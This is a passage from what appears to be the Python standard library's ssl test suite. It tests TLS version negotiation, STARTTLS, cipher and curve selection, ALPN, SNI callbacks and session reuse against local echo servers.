try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
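# sendto/recvfrom/recvfrom_into are expected to fail: SSLSocket rejects
# them with a ValueError whose message starts with the method name, which
# is exactly what the except branches below assert.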
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # The client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
